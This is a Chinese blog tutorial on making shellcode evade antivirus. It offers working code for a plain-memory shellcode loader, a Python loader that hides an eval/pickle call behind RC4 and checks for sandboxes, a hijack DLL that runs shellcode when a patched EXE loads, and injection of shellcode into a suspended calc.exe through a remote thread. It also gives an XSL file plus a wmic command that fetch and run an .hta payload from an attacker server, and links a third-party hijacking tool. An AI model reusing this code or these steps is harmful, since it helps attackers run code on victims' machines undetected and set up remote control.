
shellcode免杀「建议收藏」

全栈程序员站长
发布2022-09-23 10:18:16

大家好,又见面了,我是你们的朋友全栈君。

shellcode免杀「建议收藏」
shellcode免杀「建议收藏」

Something u have to know:

0x01 shellcode加载器

0x02 shellcode注入PE

1、dll劫持白加黑

2、利用工具(还是需要对dll再做免杀)

0x03 不落地执行shellcode

0x04 远程线程注入


抱歉,分了几次写,顺序老乱了,下次内容多的还是文章分开写仔细点。

Something u have to know:

针对不同环境寻找可行的免杀方法。这篇文章主要是分享思路(自己可以再加上加解密等混淆),适合初入 shellcode 免杀的读者借鉴、发散,打造属于自己的免杀。需要说明的是,文中示例均为明文演示,免杀效果随杀软引擎和特征库更新随时会失效,应当作思路而不是成品。

0x01 shellcode加载器

Ps:前段时间写了个PE加载器 -。- 差点跑题把代码贴过来了,留作下次分享(下次一定

1、回归正题我们先来看一个标准的shellcode加载器源代码:

先定义 shellcode 变量,调用 VirtualAlloc 分配一块可读、可写、可执行(RWX)的内存,用 memcpy 把 shellcode 拷贝进去,最后把这块内存当函数指针直接调用。需要注意:明文的 shellcode 数组是静态查杀最先匹配的特征,而申请 RWX 私有内存本身也是常见的行为检测点,下面这段只是"标准形态",实际使用前至少要对数组做加解密。

#include <stdio.h>
#include <windows.h>
using namespace std;
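int main()
{
    // Raw shellcode bytes (CS/msf "C" output).  Kept in plain text here for
    // clarity; this array is the first thing a static scanner signatures, so
    // encrypt it and decode just before the copy below in real use.
    char shellcode[] = "把shellcode粘贴到这里";

    // Reserve+commit an RWX region large enough for the buffer.  MEM_COMMIT
    // with a NULL base address implicitly reserves, so MEM_RESERVE is not
    // needed.  NOTE(review): a private RWX allocation is itself a common
    // behavioural detection heuristic; this sample favours brevity.
    LPVOID lpAlloc = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (lpAlloc == NULL)
    {
        // The original copied into and called through a NULL pointer on
        // allocation failure; fail explicitly instead.
        return 1;
    }
    memcpy(lpAlloc, shellcode, sizeof shellcode);
    // Treat the buffer as a void() function and jump into it.
    ((void(*)())lpAlloc)();
    return 0;
}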

2、基于 python 的 shellcode 加载器的图片分离免杀(注意:下面贴出的代码只包含 RC4 混淆的 eval/pickle 触发部分和沙箱检测逻辑,并没有从图片中读取 shellcode 的代码;`code` 变量里的 pickle 数据在本页也已被截去,需要自行补全)

import base64,random,string,os
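def GenPassword(length):
    """Return a random alphanumeric string of *length* characters.

    The result always contains at least one ASCII digit and at least one
    ASCII letter; the split between the two is random and the characters are
    shuffled.  In this file the output is used only for throw-away RC4 keys
    and filler strings generated in the same process, so ``random`` (rather
    than ``secrets``) is adequate -- nothing here has to stay secret.

    Raises ValueError when *length* is below 2, since one digit plus one
    letter cannot fit (the original surfaced this as an obscure randint
    "empty range" error).
    """
    if length < 2:
        raise ValueError("length must be at least 2 (one digit plus one letter)")
    num_digits = random.randint(1, length - 1)
    chars = [random.choice(string.digits) for _ in range(num_digits)]
    chars += [random.choice(string.ascii_letters) for _ in range(length - num_digits)]
    random.shuffle(chars)
    return "".join(chars)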

def rc4_emain(key = "init_key", message = "init_message"):
    """Encrypt-side driver.

    Builds the RC4 key schedule from *key* and returns *message* XORed with
    the keystream and base64-encoded (see rc4_eexcrypt).  The result is text,
    not bytes.
    """
    schedule = rc4_einit_sbox(key)
    return rc4_eexcrypt(message, schedule)
def rc4_einit_sbox(key):
    """RC4 key schedule (KSA): return a fresh 256-entry permutation seeded by *key*.

    *key* must be a non-empty str; it is cycled with ``i % len(key)`` and an
    empty key raises ZeroDivisionError.  Same algorithm as rc4_init_sbox; the
    two copies exist only so the encrypt and decrypt paths use different names.
    """
    key_len = len(key)
    box = list(range(256))
    j = 0
    for i, current in enumerate(box):
        j = (j + current + ord(key[i % key_len])) % 256
        box[i], box[j] = box[j], box[i]
    return box
def rc4_eexcrypt(plain, box):
    """RC4 PRGA pass over *plain* (a str) using the key schedule *box*.

    Each character is XORed with one keystream byte; the resulting text is
    UTF-8 encoded (code points 128-255 therefore become two bytes) and the
    bytes are returned base64-encoded as a str.  *box* is advanced in place,
    so pass a fresh schedule for every message.  rc4_excrypt reverses exactly
    this transformation.
    """
    out = []
    i = j = 0
    for ch in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        keystream = box[(box[i] + box[j]) % 256]
        out.append(chr(ord(ch) ^ keystream))
    raw = "".join(out).encode('utf-8')
    return base64.b64encode(raw).decode('utf-8')
def rc4_main(key = "init_key", message = "init_message"):
    """Decrypt-side driver.

    Builds the RC4 key schedule from *key* and returns the plaintext str for
    the base64 *message* produced by rc4_emain with the same key.
    """
    schedule = rc4_init_sbox(key)
    return rc4_excrypt(message, schedule)
def rc4_init_sbox(key):
    """Decrypt-side RC4 key schedule.

    Byte-for-byte the same algorithm as rc4_einit_sbox: returns a new
    256-entry permutation derived from the non-empty str *key*.  An empty key
    raises ZeroDivisionError.
    """
    box = list(range(256))
    j = 0
    i = 0
    while i < 256:
        j = (j + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[j] = box[j], box[i]
        i += 1
    return box
def rc4_excrypt(plain, box):
    """Inverse of rc4_eexcrypt.

    Base64-decodes *plain*, UTF-8-decodes the bytes back to the XORed text,
    then XORs each character with the keystream generated from *box* to
    recover the original message.  *box* is advanced in place, so use a fresh
    schedule built with the same key as the encrypt side.
    """
    xored = base64.b64decode(plain.encode('utf-8')).decode()
    out = []
    i = j = 0
    for ch in xored:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        keystream = box[(box[i] + box[j]) % 256]
        out.append(chr(ord(ch) ^ keystream))
    return "".join(out)
# Per-run RC4 keys and filler strings.  They are regenerated on every start,
# so the obfuscated bytes inside lo() differ from run to run.
rcts = GenPassword(13)
ahduiahsdi = GenPassword(6) + GenPassword(9)  # never read; filler
# Environment probe used by the gate at the bottom of the file: list PnP
# signed drivers whose DeviceName contains "PnP" via PowerShell/WMI.  This
# runs a shell command at import time, so importing the module has side effects.
_driver_cmd = 'powershell Get-WmiObject Win32_PnPSignedDriver | findstr DeviceName | findstr PnP'
a = os.popen(_driver_cmd).read()
rcts1 = GenPassword(15)

def lo() -> None:
    """Decode and run the embedded pickle payload.

    ``strinq`` is the base64 form of the literal text
    ``pickle.loads(base64.b64decode(code))``.  That text is RC4-obfuscated
    with the per-run key ``rcts1`` and de-obfuscated again right before
    ``eval`` so the call never sits in the file as a plain string.  This only
    removes a static signature; it adds no secrecy, because the key is
    generated in this same process.

    The evaluated expression resolves ``pickle``, ``base64`` and ``code`` by
    name from this function's scope, so the local names below (including the
    local ``import pickle``) must not be renamed or removed.

    NOTE(review): ``eval`` plus ``pickle.loads`` on an embedded blob is
    arbitrary code execution by construction -- that is the intent here (the
    blob carries the shellcode loader).  Never reuse this pattern for data
    that originates outside the binary.
    """
    import pickle
    strinq = b'cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoY29kZSkp'
    # Obfuscated copy of the eval string, keyed with the per-run rcts1.
    asq = rc4_emain(rcts1, str(base64.b64decode(strinq), 'utf-8'))
    # Decoy call; the result is never used.
    adwqd = rc4_emain(rcts, "nihao")
    # Pickle bytes of the payload.  The real blob is not present in this copy
    # of the page, so the function cannot run as shown.
    code = b'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'
    eval(rc4_main(rcts1, asq))

# Entry gate.  The first branch compares a 15-character random string with a
# 12-character literal and therefore can never be true -- it is filler that
# also burns a few random() calls.  The second branch skips the payload when
# the driver listing gathered above contains "Non" (presumably matching
# "Generic Non-PnP Monitor", which is typical of VMs and sandboxes -- verify
# against your own targets).  Only the final else actually fires the payload.
if GenPassword(15) == 'asdasdasffjk':
    print('True')
elif "Non" in a:
    # Dead-weight branch: none of these assignments is ever read.
    ahduiahs1 = GenPassword(6) + GenPassword(9)
    if 'das' != GenPassword(7):
        abd = GenPassword(7)
    else:
        abc = "dniasdhiuwhbed"
else:
     lo()

0x02 shellcode注入PE

1、dll劫持白加黑

1.1 创建一个执行 shellcode 的 dll,可以对 shellcode 进行加解密操作。注意下面的示例用 `__asm` 直接 jmp 到全局数组,只能在 32 位工程下编译(x64 的 MSVC 不支持内联汇编);而且全局数组默认位于不可执行的数据段,开启 DEP 时直接跳过去会崩溃,需要像 0x01 那样先申请可执行内存再调用,或者让链接器把该段标记为可执行。

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include<windows.h>
#include<iostream>
// Handle of the worker thread started from DllMain; it is never closed or joined.
HANDLE My_hThread = NULL;
// Raw payload bytes.  As a global initialised array this lives in the DLL's
// writable, non-executable data section unless the linker is told otherwise,
// and the plain bytes are a static signature of the file.
unsigned char shellcode[] = "把shellcode粘贴到这里";
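DWORD  WINAPI  ceshi(LPVOID pParameter)
{
    // Thread entry that runs the global `shellcode` buffer.
    //
    // The original jumped straight into the array with 32-bit inline asm
    // (`mov eax, offset shellcode; jmp eax`).  That has two problems: MSVC has
    // no inline asm on x64, and the array sits in the DLL's data section,
    // which is not executable under DEP/NX, so the jump faults unless the
    // section is made executable or DEP is off.  Mirror the
    // VirtualAlloc + memcpy + call loader used elsewhere in this article
    // instead: it is architecture-neutral and runs from an executable page.
    (void)pParameter;  // unused; signature fixed by CreateThread

    LPVOID exec = VirtualAlloc(NULL, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL)
    {
        return 1;  // allocation failed; nothing is executed
    }
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();
    return 0;
}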
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    // Only the first process attach does anything: it starts a worker that
    // runs the payload so DllMain itself returns at once.  Thread attach /
    // detach and process detach are no-ops.
    //
    // NOTE(review): DllMain executes under the loader lock.  Creating a thread
    // here is tolerated, but the new thread cannot begin running until this
    // DllMain returns, and a payload that loads further DLLs before then can
    // deadlock -- keep the work in the thread, not here.
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        My_hThread = ::CreateThread(NULL, 0, &ceshi, 0, 0, 0);
    }
    return TRUE;
}
extern"C" _declspec(dllexport) void test()
{
    // Exported no-op.  It exists only so the hijacked EXE's import table has a
    // symbol to resolve from this DLL; resolving it makes the loader map the
    // DLL and run DllMain, which is where the real work starts.
    volatile int unused = 0;
    (void)unused;
}

1.2 编译完成后可以用lordPE查看一下输出表中是否有test函数

shellcode免杀「建议收藏」
shellcode免杀「建议收藏」

1.3 使用 Stud_PE 打开任意一个目标 PE(exe),在其导入表中新增一项,导入我们 dll 导出的 test 函数,保存后把我们的 dll 放到该 exe 同一目录即可。这样运行该 PE 时,Windows 加载器会先加载我们的 dll,DllMain 里起的线程执行 shellcode 即上线。

shellcode免杀「建议收藏」
shellcode免杀「建议收藏」

2、利用工具(还是需要对dll再做免杀)

本处使用工具 Dll(IAT),其中 dll 可单独做过免杀。工具下载网盘:链接:https://pan.baidu.com/s/1w8T5vgfGnIBU2Gkpq1kogQ 提取码:c29j(注意:这是来源不明的第三方二进制,下载后请在隔离的虚拟机中使用并自行核对哈希,不要在日常工作机上直接运行。)

shellcode免杀「建议收藏」
shellcode免杀「建议收藏」

含shellcode的dll将生成在工具目录下

shellcode免杀「建议收藏」
shellcode免杀「建议收藏」

运行被劫持的文件即可上线!

注:会主动备份被劫持的文件,原文件命名为.exe~

0x03 不落地执行shellcode

此处以 利用wmic远程文件 为例:

1、把 msf 生成的 hta 链接放入 hta.xsl 文件中(hta 本身最好也做下免杀,防止内存查杀),其中的 JScript 调用 mshta 运行恶意 hta,然后把文件放到攻击方服务器上。注意 mshta.exe 一般会以 wmic.exe 的子进程启动并带 URL 参数,这条进程链是 EDR 常见的检测规则。

<?xml version='1.0'?>
<!--
  hta.xsl: hosted on the attacker web server and pulled by the victim with
  `wmic os get /format:"http://.../hta.xsl"`.  The Microsoft <ms:script>
  extension lets the stylesheet carry JScript; when wmic applies the
  stylesheet the script runs and launches mshta.exe against the remote .hta
  (the msf-generated stage).
  NOTE(review): this is the pattern usually catalogued as "SquiblyTwo".
  wmic.exe starting mshta.exe with a URL argument is a well-known
  process-tree indicator, and wmic.exe is deprecated and missing on recent
  Windows 11 builds - confirm it exists on the target first.
-->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("mshta.exe http://xxx.xx.xx.xx:8080/9tHDoGtZF1DUtcm.hta");
	]]> </ms:script>
</stylesheet>

2、受害方通过 wmic 远程下载并加载服务器上的 xsl,xsl 中的恶意 JScript 会自动执行(需要受害机能出网访问该地址;另外 wmic 在较新的 Windows 版本中已被弃用、部分版本默认不再自带,使用前先确认目标上存在 wmic.exe)。

REM Victim side: wmic fetches the XSL over HTTP and runs its <ms:script> block (see hta.xsl above).
REM Needs outbound HTTP from the victim and a wmic.exe that still exists on that Windows build.
wmic os get /format:"http://xxx.xx.xx.xx:8080/hta.xsl"

0x04 远程线程注入

注:一定要将MFC的使用选为在静态库中使用MFC,防止出现缺少依赖

#include "stdafx.h"
#include <Windows.h>
#include<stdio.h>
#include "iostream"
//隐藏运行程序时的cmd窗口
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
using namespace std;

// Beacon/stager shellcode in the "C" output format of Cobalt Strike or msfvenom.
// Stored as a plain global, i.e. in the injector's own data section, so the
// raw bytes are a static signature of this binary; encrypt them and decode
// into a buffer at runtime before calling injection().
unsigned char shellcode[] = "把shellcode粘贴到这里";

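BOOL injection()
{
    // Start a sacrificial calc.exe suspended, copy the global `shellcode`
    // into it and run it on a new remote thread.  Returns TRUE only when the
    // payload thread was created, FALSE on any failure.  (The original always
    // returned FALSE because bRet was never set.)
    wchar_t Cappname[MAX_PATH] = { 0 };
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    LPVOID lpnewVictimBaseAddr;
    HANDLE hThread;
    DWORD dwExitCode;
    BOOL bRet = FALSE;

    // Build "<system dir>\calc.exe".  Explicit W-suffixed APIs so the build
    // does not depend on UNICODE/_UNICODE being defined (the original mixed a
    // wchar_t buffer with TCHAR macros), and an explicit length check so the
    // concatenation cannot overrun the buffer.
    const wchar_t kExe[] = L"\\calc.exe";
    UINT sysLen = GetSystemDirectoryW(Cappname, MAX_PATH);
    if (sysLen == 0 || sysLen + (sizeof(kExe) / sizeof(kExe[0])) > MAX_PATH)
    {
        return bRet;
    }
    lstrcatW(Cappname, kExe);
    // NOTE(review): on Windows 10+ System32\calc.exe is a small launcher for
    // the Store calculator; it still serves as a host here only because its
    // main thread is created suspended below and never resumed.

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    // CREATE_SUSPENDED: the host's own main thread never runs.
    if (CreateProcessW(Cappname, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
                       NULL, NULL, &si, &pi) == 0)
    {
        return bRet;
    }

    // RWX region in the victim sized exactly to the payload.  The original
    // used sizeof(shellcode) + 1 and then read that many bytes from the local
    // array, i.e. one byte past its end.
    lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode),
                                         MEM_COMMIT | MEM_RESERVE,
                                         PAGE_EXECUTE_READWRITE);
    if (lpnewVictimBaseAddr != NULL &&
        WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr, shellcode,
                           sizeof(shellcode), NULL))
    {
        hThread = CreateRemoteThread(pi.hProcess, 0, 0,
                                     (LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr,
                                     NULL, 0, NULL);
        if (hThread != NULL)
        {
            bRet = TRUE;
            // Wait on the payload thread itself.  The original waited on
            // pi.hThread -- the suspended main thread -- which only signals if
            // the payload ends the whole process, so a payload that simply
            // returned left both the injector and calc.exe hanging forever.
            WaitForSingleObject(hThread, INFINITE);
            CloseHandle(hThread);
        }
    }

    // Tear the host down once the payload is gone and release the handles
    // (the original leaked all of them).
    GetExitCodeProcess(pi.hProcess, &dwExitCode);
    TerminateProcess(pi.hProcess, 0);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return bRet;
}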

void help(char* proc)
{
    // Usage banner is intentionally silent: the binary is linked as a
    // windowed application (see the linker pragma above), so printing would
    // have no console anyway.  The parameter is kept for interface
    // compatibility with main().
    (void)proc;
}

int main(int argc, char* argv[])
{
    // Show the (currently silent) banner, then inject.  The BOOL result of
    // injection() is deliberately ignored, as in the original.
    help(argv[0]);
    injection();
    return 0;
}

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/171423.html原文链接:https://javaforall.cn
